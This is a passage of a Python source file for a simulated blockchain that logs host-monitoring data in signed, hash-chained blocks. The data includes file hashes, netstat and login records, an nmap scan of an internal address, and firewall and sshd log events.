Base class for assets that are stored in a filesystem\n\n e.g. files or directories on disk and accessible by path.\n This class acts as a base class for other subclasses,\n providing common attributes to the child classes.\n\n '''\n assetid = GenericDescriptor()\n assettype = GenericDescriptor()\n assetpath = GenericDescriptor()\n\n def __init__(self, assetid=None, assettype=None, assetpath=None):\n self.assetid = assetid\n self.assettype = assettype\n self.assetpath = assetpath\n if not os.path.exists(self.assetpath):\n raise FileSystemAssetError(f'Invalid assetpath \"{self.assetpath}\"')\n\n def __repr__(self):\n return f'{self.__class__.__name__}({self.assetid}, {self.assetpath})'\n\n\nclass Directory(FileSystemAsset):\n ''' FileSystemAssets that are directories\n\n '''\n dirlisting = GenericDescriptor()\n filesindir = GenericDescriptor()\n dirhashes = GenericDescriptor()\n dirhash = GenericDescriptor()\n\n def __init__(self, lastblock=None, **kwds):\n super().__init__(**kwds)\n if not os.path.isdir(self.assetpath):\n raise DirectoryError(f'{self.assetpath} not a directory')\n # \n # we need to compute dirhash and compare against last block by author\n # to see if dirhash has changed. If it has we continue as normal\n # populating the instance attributes. If dirhash has not changed\n # filesindir and dirhashes are set to None, and just the unchanged\n # dirhash is recorded\n\n self.f_dirlisting()\n files, hashlist, directoryhash = self.f_dirhash()\n self.dirhash = directoryhash \n\n try:\n # This authorid has not written a prior block, OR\n # assetid not present in lastblock, OR\n # this assetid's .hash attribute has changed from value in lastblock\n if (lastblock is None or \\\n self.assetid not in lastblock.data.assets or \\\n self.hashchanged(lastblock)):\n self.filesindir = files\n self.dirhashes = hashlist\n\n else:\n self.filesindir = None\n self.dirhashes = None\n\n except:\n raise DirectoryError(f'Error accessing last block by this authorid')\n\n def hashchanged(self, lastblock):\n ''' Check if filehash has changed from last block\n '''\n if not lastblock.genesisblock:\n previousdirhash = lastblock.data.assets[self.assetid].dirhash\n return not self.dirhash == previousdirhash\n\n def f_dirlisting(self):\n \"\"\" Get output of ls -la for the directory asset\n\n This is a record of file metadata (mode, mtime etc).\n This attribute is always populated because currently\n we do not record file metadata any other way.\n\n \"\"\"\n command = []\n command.append('ls')\n command.append('-la')\n command.append('--time-style=long-iso')\n command.append(f'{self.assetpath}')\n try:\n cp = run(command, check=True, capture_output=True, text=True)\n self.dirlisting = cp.stdout\n except CalledProcessError:\n raise dirlistingError(f'Unable to execute ls on {self.assetpath}')\n return None\n\n def f_filesindir(self):\n ''' Computes list of all files in directory\n '''\n files = []\n for direntry in os.scandir(self.assetpath):\n if direntry.is_file():\n files.append(direntry.path)\n return files\n\n def f_dirhashes(self):\n ''' Computes list of (hash, path) for each file in directory\n '''\n hashlist = []\n files = self.f_filesindir()\n for path in files:\n hashlist.append((filehash(path), path))\n return files, hashlist\n\n def f_dirhash(self):\n ''' Compute hash over all the files in a directory\n\n Computes a single hash on a concatenation of each file's hash.\n\n '''\n s = ''\n files, hashlist = self.f_dirhashes()\n for hash, path in hashlist:\n s += hash\n directoryhash = hashlib.sha3_224(bytes.fromhex(s)).hexdigest()\n return files, hashlist, directoryhash\n\n\n\nclass FileHashOnly(FileSystemAsset):\n ''' Files for which we only want the hash\n All monitored file assets have hash recorded\n\n ''' \n hash = GenericDescriptor()\n\n def __init__(self, **kwds):\n super().__init__(**kwds)\n if not os.path.isfile(self.assetpath):\n raise FileHashOnlyError(f'{self.assetpath} not a file')\n self.f_hash()\n\n def f_hash(self):\n self.hash = filehash(self.assetpath)\n return None\n\n\n\nclass FileWhole(FileHashOnly):\n ''' Files for which we record content if hash has changed\n\n This class is an example of an asset type whose instantiation\n depends on knowledge of the last block written by author.\n\n If file hash has changed since lastblock record file contents\n using f_filecontent(), otherwise record just the hash. This class is not\n intended for files that change regularly like logfiles. Those files should\n be recorded differently eg tail.\n\n '''\n filecontent = GenericDescriptor()\n\n def __init__(self, lastblock=None, **kwds):\n super().__init__(**kwds)\n\n # This authorid has not written a last block, OR\n # assetid not present in last block, OR\n # this assetid's .hash attribute has changed from value in last block\n try:\n if (lastblock is None or \\\n self.assetid not in lastblock.data.assets or \\\n self.hashchanged(lastblock)):\n\n self.f_filecontent()\n\n else:\n self.filecontent = None\n\n except:\n raise FileWholeError(f'Error accessing last block by this authorid')\n\n def hashchanged(self, lastblock):\n ''' Check if filehash has changed from last block\n '''\n if not lastblock.genesisblock:\n previousfilehash = lastblock.data.assets[self.assetid].hash\n return not self.hash == previousfilehash\n\n def f_filecontent(self):\n try:\n with open(self.assetpath, 'r') as f:\n self.filecontent = f.read()\n except:\n raise FileWholeError(f'Unable to read file content of {self.assetpath}')\n return None\n\n\n\nclass FileWholeRemote(FileHashOnly):\n ''' Remote files for which we record content if hash has changed\n\n Remote file is copied to a local temp file used as target path\n for this class.\n\n '''\n filecontent = GenericDescriptor()\n command = GenericDescriptor()\n\n def __init__(self, lastblock=None, **kwds):\n self.f_remotefile()\n super().__init__(**kwds)\n\n # This authorid has not written a last block, OR\n # assetid not present in last block, OR\n # this assetid's .hash attribute has changed from value in last block\n try:\n if (lastblock is None or \\\n self.assetid not in lastblock.data.assets or \\\n self.hashchanged(lastblock)):\n\n self.f_filecontent()\n\n else:\n self.filecontent = None\n except:\n raise FileWholeRemoteError(f'Error accessing last block by this authorid')\n\n def hashchanged(self, lastblock):\n ''' Check if filehash has changed from last block\n '''\n if not lastblock.genesisblock:\n previousfilehash = lastblock.data.assets[self.assetid].hash\n return not self.hash == previousfilehash\n\n def f_remotefile(self):\n ''' Retrieve remote file and store locally\n '''\n self.command = []\n self.command.append('scp')\n self.command.append('-q')\n self.command.append('m4:/etc/hosts')\n self.command.append('aws_hosts.temp')\n kwds = {}\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n cmdoutput = cp.stdout\n returncode = cp.returncode\n except CalledProcessError:\n raise FileWholeRemoteError(f'scp execution failed on m4')\n return None\n\n def f_filecontent(self):\n try:\n with open(self.assetpath, 'r') as f:\n self.filecontent = f.read()\n except:\n raise FileWholeRemoteError(f'Unable to read file {self.assetpath}')\n return None\n\n\nclass Command:\n ''' Executable commands to monitor assets\n\n Properties:\n\n commandid: unique id from commandlist\n host: host on which command is executed\n user: user account on host used to execute command\n starttime: start time of execution\n endtime: time command returned\n returncode: return code from executed process\n output: stdout of command\n\n '''\n cmdid = GenericDescriptor()\n cmdtype = GenericDescriptor()\n command = GenericDescriptor()\n starttime = GenericDescriptor()\n endtime = GenericDescriptor()\n returncode = GenericDescriptor()\n cmdoutput = GenericDescriptor()\n\n def __init__(self, cmdid=None, cmdtype=None, command=None):\n self.cmdid = cmdid\n self.cmdtype = cmdtype\n self.command = command\n self.host = gethostname()\n self.user = getuser()\n self.starttime = None\n self.endtime = None\n self.returncode = None\n self.cmdoutput = None\n\n # also used by subclasses\n def __repr__(self):\n return f'{self.__class__.__name__}({self.cmdid}, {self.command})'\n\n\nclass CmdGeneric(Command):\n ''' Execute user-specified command and capture output\n\n This command is not tailored by previous invocation\n\n '''\n def __init__(self, **kwds):\n super().__init__(**kwds)\n self.f_generic()\n\n def f_generic(self):\n kwds = {}\n kwds['shell'] = True\n kwds['executable'] = '/bin/bash'\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n self.cmdoutput = cp.stdout\n self.returncode = cp.returncode\n except CalledProcessError:\n raise cmdgenericError(f'Unable to execute generic command on {self.host}')\n return None\n\n\nclass CmdNetstat(Command):\n ''' Execute netstat command and capture output\n\n This command is not tailored by previous invocation\n\n '''\n def __init__(self, **kwds):\n super().__init__(**kwds)\n self.f_netstat()\n\n def f_netstat(self):\n self.command = []\n self.command.append('netstat')\n self.command.append('-tupan')\n kwds = {}\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n self.cmdoutput = cp.stdout\n self.returncode = cp.returncode\n except CalledProcessError:\n raise cmdnetstatError(f'Unable to execute netstat on {self.host}')\n return None\n\n\nclass CmdNmap(Command):\n ''' Execute nmap command against target machine\n\n '''\n def __init__(self, **kwds):\n super().__init__(**kwds)\n self.f_nmap()\n\n def f_nmap(self):\n self.command = []\n self.command.append('nmap')\n self.command.append('-Pn')\n self.command.append('-n')\n self.command.append('-sS')\n self.command.append('--top-ports')\n self.command.append(f'{choice(range(2, 150))}')\n self.command.append('--open')\n self.command.append('10.10.3.2')\n kwds = {}\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n self.cmdoutput = cp.stdout\n self.returncode = cp.returncode\n except CalledProcessError:\n raise cmdnmapError(f'Unable to execute nmap on {self.host}')\n return None\n\n\nclass CmdPing(Command):\n ''' container for ping command and output processing functions\n\n '''\n def __init__(self, **kwds):\n super().__init__(**kwds)\n\n\nclass CmdLast(Command):\n ''' Execute last command and capture output\n\n Records logins to this machine since author's last block.\n Command parameters are tailored by previous invocation\n\n '''\n def __init__(self, lastblock=None, **kwds):\n super().__init__(**kwds)\n self.command = []\n self.command.append('last')\n self.command.append('--ip')\n try:\n # authorid has not written a last block, OR cmdid not present in last block\n if lastblock is None or self.cmdid not in lastblock.data.commands:\n self.f_last()\n else:\n self.command.append('--since')\n self.command.append(f'{strftime(\"%Y%m%d%H%M%S\", localtime(lastblock.unixtime))}')\n self.f_last()\n except:\n raise cmdlastError(f'Error accessing last block by this authorid')\n\n def f_last(self):\n kwds = {}\n kwds['check'] = True\n kwds['capture_output'] = True\n kwds['text'] = True\n try:\n cp = run(self.command, **kwds)\n self.cmdoutput = cp.stdout\n self.returncode = cp.returncode\n except CalledProcessError:\n raise cmdlastError(f'Unable to execute cmdlast on {self.host}')\n return None\n\n\nclass CmdUfwBlock(Command):\n ''' Execute journalctl command to capture UFW BLOCK events\n\n Extracts specified records from journal since last block by author was written.\n This class is an example where we don't catch subprocess.CalledProcessError\n\n '''\n def __init__(self, lastblock=None, **kwds):\n super().__init__(**kwds)\n self.command = []\n self.command.append('journalctl')\n self.command.append('-o')\n self.command.append('short-unix')\n self.command.append('--no-pager')\n self.command.append('-n')\n self.command.append('100000')\n self.command.append('--quiet')\n self.command.append('-g')\n self.command.append('ufw block')\n try:\n # authorid has not written a last block, OR cmdid not present in last block\n if lastblock is None or self.cmdid not in lastblock.data.commands:\n self.f_journalctl()\n else:\n self.command.append('--since')\n self.command.append(f'@{lastblock.unixtime}')\n self.f_journalctl()\n except:\n raise cmdufwblockError(f'Error accessing last block by this authorid')\n\n def f_journalctl(self):\n ''' Executes the constructed journalctl command\n\n Does not raise CalledProcessError for non-zero exit code.\n We expect a non-zero exit code of 1 if there are no new\n specified journal entries. We catch any non-zero exit\n codes other than 1.\n\n '''\n def filteroutput(output):\n ''' Filter journalctl command output as specified herein\n '''\n filteredoutput = ''\n po = re.compile(r'''\n (\\d+\\.\\d+)\n \\s.+\n \\[UFW(\\sBLOCK)\\]\n .+\n (\\sSRC=\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\n (\\sDST=\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\n .+\n (\\sPROTO=\\w+\\sSPT=\\d+\\sDPT=\\d+.+)\n \\n\n ''', flags=re.VERBOSE)\n for m in re.finditer(po, output):\n filteredoutput += ''.join(m.groups()) + '\\n'\n return filteredoutput \n\n kwds = {}\n kwds['check'] = False # set True for testing\n kwds['capture_output'] = True\n kwds['text'] = True\n cp = run(self.command, **kwds)\n self.returncode = cp.returncode\n self.cmdoutput = filteroutput(cp.stdout)\n # self.cmdoutput = cp.stdout\n if self.returncode not in {0, 1}:\n print(f'journalctl returncode = {self.returncode}')\n raise cmdufwblockError(f'Unable to execute cmdjournalctl on {self.host}')\n\n return None\n\n\nclass CmdSshd(Command):\n ''' Execute journalctl command to capture unauthorized ssh connnection attempts\n\n Extracts specified records from journal since last block by author was written.\n This class is an example where we don't catch subprocess.CalledProcessError\n\n '''\n def __init__(self, lastblock=None, **kwds):\n super().__init__(**kwds)\n self.command = []\n self.command.append('journalctl')\n self.command.append('-o')\n self.command.append('short-unix')\n self.command.append('--no-pager')\n self.command.append('-n')\n self.command.append('1000')\n self.command.append('--quiet')\n self.command.append('_SYSTEMD_UNIT=ssh.service')\n try:\n # authorid has not written a last block, OR cmdid not present in last block\n if lastblock is None or self.cmdid not in lastblock.data.commands:\n self.f_journalctl()\n else:\n self.command.append('--since')\n self.command.append(f'@{lastblock.unixtime}')\n self.f_journalctl()\n except:\n raise cmdsshdError(f'Error accessing last block by this authorid')\n\n def f_journalctl(self):\n ''' Executes the constructed journalctl command\n\n Does not raise CalledProcessError for non-zero exit code.\n We expect a non-zero exit code of 1 if there are no new\n specified journal entries. We catch any non-zero exit\n codes other than 1.\n\n '''\n def filteroutput(output):\n ''' Filter journalctl output as specified herein\n '''\n filteredoutput = ''\n po = re.compile(r'''\n (\\d+\\.\\d+\\s)\n \\S+\n \\s\n (sshd.+:\\s)\n (Invalid.+|error.+|Unable.+|Disconnecting.+)\n \\n\n ''', flags=re.VERBOSE)\n for m in re.finditer(po, output):\n filteredoutput += ''.join(m.groups()) + '\\n'\n return filteredoutput \n\n kwds = {}\n kwds['check'] = False # set True for testing\n kwds['capture_output'] = True\n kwds['text'] = True\n cp = run(self.command, **kwds)\n self.returncode = cp.returncode\n self.cmdoutput = filteroutput(cp.stdout)\n if self.returncode not in {0, 1}:\n print(f'journalctl returncode = {self.returncode}')\n raise cmdsshdError(f'Unable to execute cmdjournalctl on {self.host}')\n\n return None\n\n\nclass BlockData:\n ''' class for block data\n\n This class defines properties & methods of the data portion of a block.\n This class is implements two dictionaries, assets and commands,\n which hold the data of a block.\n\n Instances of this class become the value of block.data,\n a property of a block instance, Block()\n\n blockdatainstance = BlockData()\n blockinstance = Block()\n blockinstance.data = blockdatainstance\n\n '''\n assets = GenericDescriptor()\n commands = GenericDescriptor()\n\n def __init__(self, assetlist=[], commandlist=[]):\n ''' Instantiate and populate with assets and commands\n\n Called from main()\n\n Input:\n Asset instances parsed from assetlist csv file\n Command instances parsed from commandlist csv file\n\n Output:\n A single blockdata instance for use in construction of a block\n\n '''\n self.assets = {}\n self.commands = {}\n for asset in assetlist:\n self.appendasset(asset)\n for command in commandlist:\n self.appendcommand(command)\n\n def __repr__(self):\n return f'{self.__class__.__name__}({len(self.assets)} assets, {len(self.commands)} commands)'\n\n def appendasset(self, asset):\n ''' Adds an asset instance to blockdata.assets dict\n\n assetid is used as dictionary key\n\n '''\n self.assets[asset.assetid] = asset\n return None\n\n def appendcommand(self, command):\n ''' Adds a command instance to blockdata.commands dict\n\n cmdid is used as dictionary key\n\n '''\n self.commands[command.cmdid] = command\n return None\n\n\nclass Block:\n ''' class for block\n\n This class defines the properties and methods of a block.\n Instances of this class are blocks, stored in a property of blockchain\n\n blockinstance = Block()\n blockchain.blocks.append(blockinstance)\n\n '''\n\n blocknumber = GenericDescriptor()\n authorid = GenericDescriptor()\n previousblockhash = GenericDescriptor()\n genesisblock = GenericDescriptor()\n unixtime = GenericDescriptor()\n datetime = GenericDescriptor()\n tz = GenericDescriptor()\n tzoffset = GenericDescriptor()\n nonce = GenericDescriptor()\n data = GenericDescriptor()\n comment = GenericDescriptor()\n sig = GenericDescriptor()\n\n def __init__(self):\n ''' Construct a skeleton block instance\n '''\n self.blocknumber = None\n self.authorid = None\n self.previousblockhash = None\n self.genesisblock = False\n self.unixtime = None\n self.datetime = None\n self.tz = None\n self.tzoffset = None\n self.nonce = None\n self.data = None\n self.comment = None\n self.sig = None\n\n def __repr__(self):\n return f'{self.__class__.__name__}({self.blocknumber}, {self.authorid})'\n\n def computeblocksig(self, skfile=None):\n ''' Compute signature over a populated block using author's signing_key\n\n Called from BlockChain.makenextblock(). This function is a method of\n Block() because it depends on an incomplete block i.e. a block that is\n in the process of being constructed, whereas the methods of\n BlockChain() mainly act upon existing blocks in the blockchain.\n\n All block properties, except block.sig, are serialized into a BytesIO\n object and the sig is computed on its value.\n\n Inputs:\n Path to a file containing the private signing key as bytes.\n\n Output:\n A base64 encoded signature\n '''\n if skfile is None:\n raise computeblocksigError(f'No block signing key specified')\n\n try:\n bytes_to_sign = self.bytestosign()\n except:\n raise computeblocksigError('No bytes to sign')\n\n try:\n with open(skfile, 'rb') as f:\n skbytes = f.read()\n sk = signing.SigningKey(skbytes)\n except:\n raise computeblocksigError(f'Unable to open signing key file {skfile}')\n\n try:\n signed = sk.sign(bytes_to_sign)\n signature = signed.signature\n except:\n raise computeblocksigError('Error creating signature')\n\n return b64encode(signature)\n\n def bytestosign(self):\n ''' Serialize block attributes for signing and verifying operations\n\n Constructs a bytes object over which a signature will be computed or verified.\n Concatenates pickles of all block attribute values except self.sig\n\n Output:\n Returns a serialized bytes object of concatenated pickles\n\n '''\n signlist = [self.blocknumber,\n self.authorid,\n self.previousblockhash,\n self.genesisblock,\n self.unixtime,\n self.datetime,\n self.tz,\n self.tzoffset,\n self.nonce,\n self.data,\n self.comment]\n\n return serialize(signlist)\n\n\nclass BlockChain:\n ''' class for blockchain\n\n This class defines the properties and methods of the blockchain.\n Only one instance of this class exists.\n This sole instance contains the entire blockchain.\n This instance object is saved as a pickle file.\n\n bc = BlockChain()\n bc.blocks.append(block)\n\n '''\n\n blocks = GenericDescriptor()\n blockcount = GenericDescriptor() # length of blockchain\n totaldatasize = GenericDescriptor()\n head = GenericDescriptor() # last block number\n\n\n def __init__(self):\n ''' only called to instantiate a new blockchain\n '''\n self.blocks = []\n self.blockcount = 0\n self.totaldatasize = None\n self.head = None\n self.addnewblock(self.genesis())\n\n\n def __repr__(self):\n return f'{self.__class__.__name__}({self.blockcount} blocks, head = {self.head})'\n\n\n def genesis(self):\n ''' constructs the genesis block\n\n Called by __init__ when instantiating a new blockchain\n\n Output:\n The signed genesis block\n\n '''\n try:\n genesisblock = Block()\n genesisblock.blocknumber = 0\n genesisblock.authorid = AUTHORIDGENESIS\n genesisblock.previousblockhash = 0\n genesisblock.genesisblock = True\n genesisblock.nonce = randbits(64)\n genesisblock.data = BlockData() # could be None\n genesisblock.unixtime = time()\n genesisblock.datetime = ctime(genesisblock.unixtime)\n genesisblock.tz = localtime(genesisblock.unixtime).tm_zone\n genesisblock.tzoffset = strftime('%z', localtime(genesisblock.unixtime))\n genesisblock.comment = f'Genesis block created by admin on {genesisblock.datetime}'\n genesisblock.sig = genesisblock.computeblocksig(skfile=SIGNINGKEYFILEGENESIS)\n except:\n raise genesisError('Error making genesis block')\n\n return genesisblock\n\n\n def makenextblock(self, block=None, authorid=None):\n ''' Constructs the next block to be added to blockchain\n\n Assigns values to block properties. Signing the block is performed by\n assiging the computed signature to block.sig. This completes the\n creation of a block, which can then be added to blockchain.\n\n Called from main()\n\n Input:\n A block instance for which only .data attribute has been set in main()\n The authorid identifying the author and signer of this block\n\n Output:\n A signed block that can be added to the blockchain\n\n '''\n if block is None or authorid is None:\n raise makenextblockError('Cannot make next block without block and authorid')\n\n try:\n block.blocknumber = self.head + 1\n block.authorid = authorid\n block.previousblockhash = self.computeblockhash(self.blocks[self.head])\n block.genesisblock = False\n block.nonce = randbits(64)\n block.unixtime = time()\n block.datetime = ctime(block.unixtime)\n block.tz = localtime(block.unixtime).tm_zone\n block.tzoffset = strftime('%z', localtime(block.unixtime))\n block.comment = f'Block created by {getuser()}@{gethostname()} on {block.datetime}'\n block.sig = block.computeblocksig(skfile=f'{SIGNINGKEYFILEPREFIX}{block.authorid}')\n except:\n raise makenextblockError('Error making next block')\n\n return block\n\n\n def addnewblock(self, block):\n ''' Append a new block to the blockchain\n\n Verifies authenticity of previous block, bc[bc.head]\n Called from main()\n\n Input:\n A complete signed block\n\n Output:\n The blockchain instance modified by the new appended block\n\n Each author verifies the previousblockhash property and signature of\n the head block before adding a new block to maintain the integrity of\n the blockchain.\n\n '''\n\n # verify previousblockhash of head block\n if self.blockcount > 1:\n if self.verifypreviousblockhash(self.head):\n print(f'{self.blocks[self.head]} block.previousblockhash verified.')\n else:\n raise addnewblockError(f'head.previousblockhash verification failed.') \n\n # verify signature of head block\n if self.blockcount > 0:\n if self.verifyblocksig(block=self.blocks[self.head]):\n print(f'{self.blocks[self.head]} signature verified')\n print(f'Proceeding to add new block {block.blocknumber} by {block.authorid}')\n else:\n raise addnewblockError(f'signature verification of head block failed') \n\n try:\n self.blocks.append(block)\n self.blockcount = len(self.blocks)\n # consistency check\n if self.blocks[-1].blocknumber == len(self.blocks) - 1:\n self.head = self.blocks[-1].blocknumber\n else:\n raise addnewblockError('Blocknumber mismatch')\n except:\n raise addnewblockError('Error adding next block to bc')\n\n return None\n\n\n def computetotaldatasize(self):\n ''' Compute total size of data bytes in blockchain\n\n Sum of each block.data.asset.\n Sum of each block.data.command.\n\n Return a byte count as an integer\n '''\n\n\n def verifyblocksig(self, block=None):\n ''' Verify block signature of a block on the bc\n\n This is a blockchain method so we can verify the signature of any block\n on the bc, whereas creating a block signature is a block instance\n method because signing is part of block construction.\n\n Input:\n Path to the file containing the verification key\n A block instance existing on the bc\n\n Output:\n Boolean True if signature verifies ok, otherwise\n a signature verification error is raised.\n\n '''\n if block is not None:\n # compute same serialized bytes object used to create signature\n bytestoverify = block.bytestosign()\n else:\n raise verifyError('No block to verify')\n\n vkfile = f'{VERIFYKEYFILEPREFIX}{block.authorid}'\n try:\n with open(vkfile, 'rb') as f:\n vkbytes = f.read()\n vkey = signing.VerifyKey(vkbytes)\n except:\n raise verifyError(f'Unable to open verify key file {vkfile}')\n\n try:\n verified = vkey.verify(bytestoverify, b64decode(block.sig))\n except:\n print(f'sig verify failed {vkfile}')\n return False\n else:\n return verified == bytestoverify\n\n\n def computeblockhash(self, block):\n ''' Compute hex-encoded hash of an existing block in blockchain\n \n Hash over the entire contents of an existing block\n\n Input:\n An existing block on the bc\n\n Output:\n Hex-encoded hash over block\n\n '''\n hashlist = [block.blocknumber,\n block.authorid,\n block.previousblockhash,\n block.genesisblock,\n block.unixtime,\n block.datetime,\n block.tz,\n block.tzoffset,\n block.nonce,\n block.data,\n block.comment,\n block.sig]\n\n return hashlib.sha3_224(serialize(hashlist)).hexdigest()\n\n\n def verifypreviousblockhash(self, blocknumber=None):\n ''' Verify block.previousblockhash property\n\n Computes hash of previous block and compare with block.previousblockhash\n\n Input:\n Blocknumber of block containing the .previousblockhash attribute value\n that we want to verify against a computed hash over the preceding block.\n \n Output:\n Boolean True (verification succeeded) or False (verification failed)\n\n '''\n if blocknumber is not None:\n if 0 < blocknumber < self.blockcount:\n calculated = self.computeblockhash(self.blocks[blocknumber - 1])\n recorded = self.blocks[blocknumber].previousblockhash\n return calculated == recorded\n else:\n raise verifypreviousblockhashError('Block number outside valid range')\n else:\n raise verifypreviousblockhashError('Block number not specified')\n\n\ndef serialize(iterable):\n ''' Serialize objects from iterable\n\n Each object from iterable is pickled and written to a BytesIO instance\n the value of which is returned as a bytes object.\n\n Input:\n An iterable of objects to be serialized\n\n Output:\n A bytes object containing the concatenated pickles\n\n '''\n binarystream = BytesIO()\n bw = BufferedWriter(binarystream)\n try:\n for item in iterable:\n bw.write(dumps(item, pickle.HIGHEST_PROTOCOL))\n bw.flush()\n except:\n raise serializeError('Error serializing into pickle')\n return binarystream.getvalue()\n\n\ndef filehash(path):\n ''' Compute a hash of a file\n '''\n if not os.path.isfile(path):\n raise filehashError(f'Path is not a file: {path}')\n try:\n with open(path, 'rb') as f:\n return hashlib.sha3_224(f.read()).hexdigest()\n except:\n raise filehashError(f'Unable to read file')\n\n\ndef main():\n\n\n p = argparse.ArgumentParser(description='Simulate a blockchain')\n subparsers = p.add_subparsers(required=True, dest='subcommand', title='mandatory subcommand')\n # subcommands\n p1 = subparsers.add_parser('newbc', help='create new blockchain')\n p2 = subparsers.add_parser('admin', help='administer a blockchain')\n p3 = subparsers.add_parser('agent', help='perform agent actions on blockchain')\n # mandatory arguments for agents\n g3 = p3.add_mutually_exclusive_group(required=True)\n g3.add_argument('--m1', help='add to blockchain as m1', action='store_true')\n g3.add_argument('--m2', help='add to blockchain as m2', action='store_true')\n g3.add_argument('--m4', help='add to blockchain as m4', action='store_true')\n # option arguments for admin functions\n p2.add_argument('--sync', help='determine latest blockchain for syncing', action='store_true')\n p2.add_argument('-p', '--printsummary', help='Print blockchain summary', action='store_true')\n p2.add_argument('-i', '--checkintegrity', help='Check blockchain integrity', action='store_true')\n p2.add_argument('-s', '--summarizeblock', help='Summarize a block', type=int, metavar='BLKNUM')\n p2.add_argument('-d', '--blockdata', help='Show block data details', type=int, metavar='BLKNUM')\n p2.add_argument('-r', '--dirasset', help='Show dir asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-f', '--fileasset', help='Show file asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-fw', '--filewholeasset', help='Show filewhole asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-fr', '--filewholeremote', help='Show filewholeremote asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-c', '--commandasset', help='Show command asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-rh', '--dirassethist', help='Show dir asset history', metavar='ASSETID')\n p2.add_argument('-fh', '--fileassethist', help='Show file asset history', metavar='ASSETID')\n p2.add_argument('-ch', '--cmdhist', help='Show command asset history', metavar='CMDID')\n p2.add_argument('-hc', '--hashchanges', help='Show where hashes have changed', metavar='AUTHOR')\n p2.add_argument('-dd', '--dirdiff', help='Show directory change', nargs=3, metavar=('ASSETID', 'BLKNUM1', 'BLKNUM2'))\n p2.add_argument('-hl', '--hashlist', help='Extract all unique file hashes', action='store_true')\n\n args = p.parse_args()\n\n\n def readassetlist(path):\n ''' Convert the assetlist csv file to instances of defined asset classes\n\n Reads ASSETLISTPATH csv file and converts each line to an instance\n of the known asset class represented by the line.\n\n Input:\n path to assetlist file on disk\n\n Output:\n a list containing asset instance objects whose baseclass is FileSystemAsset\n\n '''\n if not os.path.isfile(path):\n raise readassetlistError(f'Invalid ASSETLISTPATH: {path}')\n with open(path, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n assetinstances = []\n for asset in reader:\n kwargs = {}\n if asset['AssetType'] in ASSETTYPES and not asset['AssetID'].startswith('#'):\n # for assets where knowledge of last block is required\n if asset['AssetType'] in ASSETTYPESLASTBLOCK:\n kwargs['lastblock'] = lastblockbyauthor(authorid=AUTHORID)\n for k, v in asset.items():\n kwargs[k.lower()] = v\n # create instance of class, asset['AssetType'], passing kwargs\n assetinstances.append(eval(asset['AssetType'])(**kwargs))\n elif asset['AssetType'] not in ASSETTYPES:\n e = f'Unknown asset type {asset[\"AssetType\"]} in {path}'\n raise AssetTypeError(e)\n\n return assetinstances\n\n\n def readcommandlist(path):\n ''' Convert the commandlist csv file to instances of defined command classes\n\n Reads COMMANDLISTPATH csv file and converts each line to an instance\n of the known command class represented by the line.\n\n Input:\n path to commandlist file on disk\n\n Output:\n a list containing command instance objects whose baseclass is Command\n\n '''\n if not os.path.isfile(path):\n raise readcommandlistError(f'Invalid COMMANDLISTPATH: {path}')\n with open(path, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n commandinstances = []\n for command in reader:\n kwargs = {}\n if command['CmdType'] in COMMANDTYPES and not command['CmdID'].startswith('#'):\n # for commands where knowledge of last block is required\n if command['CmdType'] in COMMANDTYPESLASTBLOCK:\n kwargs['lastblock'] = lastblockbyauthor(authorid=AUTHORID)\n for k, v in command.items():\n kwargs[k.lower()] = v\n # create instance of class, command['CmdType'], passing kwargs\n commandinstances.append(eval(command['CmdType'])(**kwargs))\n elif command['CmdType'] not in COMMANDTYPES:\n e = f'Unknown command type {command[\"CmdType\"]} in {path}'\n raise CommandTypeError(e)\n\n return commandinstances\n\n\n def lastblockbyauthor(authorid=None):\n # get reference to last block written by author\n for block in reversed(bc.blocks):\n if block.authorid == authorid:\n return block\n\n\n def createnewblockchain():\n ''' Generate a new bc with genesis block\n\n Call via arg parser\n\n '''\n blockchaininstance = BlockChain()\n return blockchaininstance\n\n\n def loadblockchain(blockchainfile=BLOCKCHAINFILE):\n ''' read a pickle file which contains an entire blockchain\n this method should return the reconstructed blockchain object\n '''\n if not os.path.isfile(blockchainfile):\n raise loadblockchainError(f'Blockchain file not found')\n # print('Loading existing blockchain...')\n with open(blockchainfile, 'rb') as f:\n return load(f)\n\n\n def saveblockchain(blockchainfile=BLOCKCHAINFILE):\n ''' save blockchain to a pickle file\n '''\n with open(blockchainfile, 'wb') as f:\n dump(bc, f, pickle.HIGHEST_PROTOCOL)\n\n\n def printsummary():\n ''' print a summary of the current state of the blockchain\n '''\n print('\\n')\n print('=' * 100)\n print(f'{bc}')\n print(bc.__dict__)\n print('-' * 50)\n for block in bc.blocks:\n print(f'{block}')\n print(block.__dict__)\n print('-' * 50)\n print('\\n\\n')\n\n\n def createnewblock():\n ''' create a new block and write it to the blockchain\n\n Reads and parses the asset csv files and uses these asset instances\n to populate the new block and then appends it to blockchain.\n\n '''\n # read asset specification\n assetlist = readassetlist(ASSETLISTPATH)\n commandlist = readcommandlist(COMMANDLISTPATH)\n\n # create new block instance\n block = Block()\n\n # populate new block with asset data\n block.data = BlockData(assetlist, commandlist)\n\n # complete the block and add it to blockchain\n bc.addnewblock(bc.makenextblock(block=block, authorid=AUTHORID))\n\n\n def summarizeblock(blocknumber=None):\n ''' summarize a block\n '''\n if 0 <= blocknumber <= bc.head:\n print('\\n')\n print('-' * 30)\n print(f'summarizing {bc.blocks[blocknumber]}')\n print('-' * 30)\n print('\\n')\n\n for prop, val in bc.blocks[blocknumber].__dict__.items():\n print(f'{prop.lstrip(\"_\"):>20}: {repr(val):<40}')\n\n print(f' Assets')\n for k, v in bc.blocks[blocknumber].data.assets.items():\n print(f' {k} 